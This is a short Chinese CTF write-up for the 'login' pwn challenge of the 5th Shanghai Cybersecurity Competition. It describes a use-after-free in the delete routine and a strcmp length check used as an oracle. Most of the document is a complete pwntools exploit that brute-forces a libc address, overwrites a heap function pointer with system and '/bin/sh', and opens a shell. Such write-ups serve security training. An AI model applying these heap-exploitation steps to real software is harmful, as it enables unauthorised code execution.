第五届上海市网络安全大赛

login

这题没有show，delete里存在uaf漏洞，多了一个login，里面有strcmp函数，根据你输入的长度size，content与堆里保存的数据进行长度为size的content对比。

add里在你malloc一个堆块后，又会自行malloc一个size为0x20的堆块，里面有一个指针，指向你的ptr ←就是我们利用的点了。

贴上exp：

from pwn import *
context(os = 'linux' , arch = 'amd64' , log_level = 'debug')
sh = process('./login')
elf = ELF('./login')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def	login(index,password):
	sh.sendlineafter("Choice:",'1')
	sh.sendlineafter("id:\n",str(index))
	sh.sendlineafter("length:\n",str(len(password)))
	sh.sendlineafter("password:\n",password)
	d = sh.recvline().strip()
	if d == 'Login success!':
	 return 1
	else:
	 return 0
#这里就是爆破对比
def	guess(index,prefix):
 for i in range(256):
  if(login(index,chr(i)+prefix)):
	return i
#这里就是从7f开始比对，执行6次
def	leak():
 addr=''
 for i in range(5):
	edit(4,chr(0x95-i))
	addr = chr(guess(0,addr))+addr
 return u64('\x00'+addr + '\x00\x00')

def	edit(index,password):
	sh.sendlineafter("Choice:",'4')
	sh.sendlineafter("id:\n",str(index))
	sh.sendlineafter("pass:\n",password)

def	add(index,password):
	sh.sendlineafter("Choice:",'2')
	sh.sendlineafter("id:\n",str(index))
	sh.sendlineafter("length:\n",str(len(password)))
	sh.sendlineafter("password:\n",password)

def	dele(index):
	sh.sendlineafter("Choice:",'3')
	sh.sendlineafter("id:\n",str(index))

def	z(commond=''):
	gdb.attach(sh,commond)

def	exploit():
	add(0,'a')#0
	add(1,'a'*0x90)#1
	add(2,'a')#2
	dele(0)
	dele(1)
	add(3,'a'*0x30)#0
	add(4,'\x90')#1	
	base = leak()-0x3c4b00
	log.success('libc.addr = ' + hex(base))	
	#z()
	dele(4)
	binsh = base + libc.search('/bin/sh').next()
	system = base + libc.sym['system']
	add(5,p64(binsh)+p64(system))
	sh.sendlineafter('Choice:','1')
	sh.sendlineafter('id:\n','4')
	password = '/bin/sh'
	sh.sendlineafter('length:\n',str(len(password)))
	sh.sendafter('password:\n',password)
exploit()
sh.interactive()

（爆破的感觉有点爽）